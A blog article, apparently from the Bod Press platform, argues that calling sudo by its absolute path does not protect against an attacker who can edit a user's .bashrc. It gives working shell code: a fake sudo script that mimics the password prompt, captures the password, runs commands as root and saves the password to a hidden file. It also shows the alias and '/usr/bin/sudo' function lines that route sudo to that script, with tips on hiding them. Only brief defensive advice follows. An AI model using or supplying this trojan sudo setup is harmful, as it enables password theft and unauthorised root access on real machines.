A Song of Ice and FireAlphaGoAntivirusArtificial IntelligenceBashBod PressBusinessCharityChatbotChildrenComputerConflict ZoneCouchDBEbola VirusFM ReceiverGame of ThronesGeolocationGeorge R.R. MartinGuideIncorporationInformation SecurityIoTJavaScriptLawLearningLinus TorvaldsMedicine Mental IllnessNewsNoSQLOperating SystemRansomwareRansomware DayReviewRevolutionRobotsSHA-1San FranciscoScienceSmall BusinessSolar EclipseTechnologyThe Fourth Industrial RevolutionThe FutureTime ManagementUnix-likeVanilla ForumsWana Decrypt0rWelcomeWordpressWorld Bank GroupZero-day Vulnerability

Is It Safe to Use an Absolute Path in The Unix-like Systems, as We Used to Think?

The idea of editing the user environment variables to elevate the rights in penetration testing is as old as the world. On this topic written many articles and even in books began appearing tips for using an absolute path instead of a relative. Here is an example of such a council from the relatively well-known book UNIX and Linux System Administration Handbook, 4th Edition:

You should take it as a rule with the command to specify the full name, such as /bin/su and /usr/bin/su, and not just su. This will serve as a specific protection from those programs with the name of the su, who deliberately had been prescribed in the path environment variable by an attacker intends to put together a good harvest password.

But is it safe? If you too are asked this question, you are welcome under the cut./p>

Let's order. Suppose we were on the unix-like server under a user account with limited rights. We want to get root access, but we do not know the password. For example, we tried all the usual methods of elevation through an error in the configuration and under the various exploits the kernel, but all to no avail. It would seem that no more options. However, if the user is in the group of the sudo, you can try to crank out one trick.

The idea is that on most unix-like machines sudo is used to elevate the rights temporarily. When using sudo user is required to enter his current password. Therefore, knowledge of the user's password to access to sudo gives us the root.

Almost all modern unix-like servers are using bash or zsh as the default shell. They have a config file (for example, .bashrc for bash), which are stored in your home directory. With their help, you can change almost everything in the shell environment. By default, they have the right to 644 (-rw-r ' r'). Therefore, the owner can edit them without any problems.

The bottom line is that the shells have alias`y with which commands can be shortened.

For example, the standard alias of .bashrc:

alias ll='ls -alF'

When calling ll actually ls -alF will be called. Similarly, we can proceed with sudo:

alias sudo='echo PWNED'

Then performing the sudo command on a relative path will cause what we have indicated in the alias.

Use slashes in the alias are not possible, therefore the absolute path really is a safe solution in this case. Just save the absolute path in the case of editing the PATH environment variable.

Now consider the case in which the absolute path is not a safe solution. In the configuration you can create functions that work similarly to alias except that slashes could be used in their names:

function /usr/bin/sudo() { echo PWNED }

Now the call /usr/bin/sudo will also execute our code.

The next stage is writing the script, which will behave similarly to the sudo (ask for the password and elevate user rights), but at the same time to intercept the user's password and execute arbitrary code with administrator rights.

In the end, we get the execution of the script when trying to invoke sudo through an absolute or relative path.

To get started let's writing the poisonous sudo code:

echo -n "[sudo] password for $LOGNAME: "
read -s password

echo command='whoami'

eval "echo -e $password | sudo -S --prompt='' $command"
eval "echo -e $password | sudo -S --prompt='' $*"

It asks the user password in the sudo-style, and then stores it in a variable, executes our code with elevated privileges, and then does what the user wanted.

Now let's hide it in some inconspicuous directory (eg ~ / .local) and set it +x on the right execution (chmod + x sudo). What is the filename, in fact, does not matter to us, so it's better to call it too somehow unnoticed (e.g., .config).

With reading -s password, we read the password in the variable $password. The variable command = 'whoami' contains commands that we will perform with elevated privileges.

Construction echo -e $password | sudo -S is used here to convey our variable $password with the password to the sudo through stdin.

'prompt = ' needed to no real message 'enter the password' of sudo where displayed when we turn to it. Otherwise, it will look a little suspicious.

Now you need to find the full path to sudo using whereis. For example, /usr/bin/sudo. Let's correct .bashrc so that the sudo command and the /usr/bin/sudo run our script. To do this, write to .bashrc (somewhere in the center inconspicuously) the following code, which must be edited for yourself:

alias sudo='~/.local/.config'
function /usr/bin/sudo() { eval "~/.local/.config $*" }

Profit. Now we will try to save the user's password to a file. To do this, replace the current command.

command="echo $password > ~/.local/.1"

Everything worked out, qwerty123 is the user's password. It remains still a lot of special cases in which our script may behave incorrectly. For example, sudo su or sudo 'help. Since in this paper we consider only the possibility of implementing such an attack, the process of bringing it to shine, I shifted to the shoulders of the reader.

Now you know that the use of the absolute path to unix-like systems is not so safe.

Now the central question: how to protect themselves from possible attacks? In my opinion, the best option would be to allow editing .bashrc only under root. Of course, there is a second choice, but it is less convenient and safe: to constantly check the integrity of the configs.

Related Coverage

Legal issues At some point in life, everyone gets an idea of starting their own business – be it that of dealing in diamonds, opening a restaurant or simply starting a bar they always wanted to open! It is always exciting to start a small business of your own and dreaming about it.


One of the most challenging tasks in computer programming is developing an OS and frankly, is not for everyone except the most hard core geekheads among you. In order to start with creating your very own OS let us start by viewing the basic definitions of what a BIOS or boot loader is and does. An operating.

January 20, 11 AM
AlphaGo Beginner's Guide

AlphaGo Everyone knows that DeepMind's AlphaGo defeated 18 times world champion Lee Sedol on March 9 2016 at the ancient Chinese game- Go. What’s fascinating is that the game of Go has as many possible moves as there are atoms in the universe. This motivated us to find out more about AlphaGo.


Last month, the World Bank Group published the World Development Report (WDR) 2018, the first-ever edition entirely focused on education. The report warns of a learning crisis in global education and the severity of this in the deprived areas. Shockingly, there are still around 260 million children who aren’t even enrolled in primary or secondary schools. Education is meant to equip stud.


Medicine is the most rapidly growing area of expertise. In recent decades, new technologies and scientific discoveries have changed the idea of the body and its diseases and at the same time the approach to the treatment of the whole person.


he World Health Organization estimates that about 300 million people around the world are suffering from depression, 60 million from bipolar affective disorder, and 21 million from schizophrenia.


The Internet of Things The first three industrial revolutions were triggered by steam, electricity, and, and wired computers which transformed people’s way of life and manufacturing and brought digital capabilities to billions of people.


Opening your own business is a task that is certainly difficult and responsible, but experienced entrepreneurs will agree that real difficulties come when you start developing an already launched project.


Automation of business processes is no longer just an evolving trend in digital marketing. Today it is an integral part of a brand communication.


We all have stories about working in dysfunctional offices, with wacky colleagues and under stressful deadlines. But even this cannot compare to working in a conflict zone, a place that is ravaged by war.


Game of ThronesGeorge R.R. Martin is an American novelist, fantasy, sci-fi and short story writer. Most of the world got acquainted with him after screen adaptation of his epic saga "a Song of Ice and Fire".


Over the last years the art of time management gains popularity. Why so? The answer is very simple: we want to control our life. No wonder there are plenty of interesting techniques allowing us to properly schedule and manage our time.


Ebola Virus The Ebola virus causes a severe illness that is often lethal in the absence of treatment.

July 11, 09 AM
Welcome to Bod Press

Bod Press is a global social network for readers, journalists and companies engaged in writing and reading. The unique audience, fresh information, constructive communication, and collective creativity.


Bod Intelligent Antivirus This review is dedicated to the Bod Intelligent Antivirus developed by Bod Security. The purpose of the article is to show its functionality and demonstrate how it behaves in real conditions.

634 2

wordpress Automattic Company, the developer of WordPress, will no longer spend money on maintaining the office in San Francisco.


Computer Technology It seems that many years have passed, which made an eternity by the standards of the world of computer technology. And the reflection on past mistakes does not stop. And what would have happened if...


Robotic assistant Millions of American families buy automatic voice assistants to turn off the lights instead of themselves, order pizza and show movie program in the cinema.


The data about critical vulnerabilities in WordPress were published - they allow remote execution of shell commands and resetting the administrator password through the substitution of the Host header.

769 1

More than 60,000 computers were attacked and infected with a virus-extortionist Wana Decrypt0r.


At some time, I had to work with one of the document-oriented DBMS – Apache CouchDB, but I had some difficulties with the search of the documentation.


The article describes how to work with push notifications about object events in browsers.


Imagine that you are sitting and waiting for someone in the car, and the poster of your favorite group has caught your eye.


We will organize the small distribution of free stuff for those who aspire to bring something good, kind, wise, and eternal to children.


Google's co-workers and the Centre of Mathematics and Computer Science in Amsterdam, presented the first algorithm generating collisions for SHA-1.

Never miss a story by James Monroe, when you sign up for Bod Press.
Sign up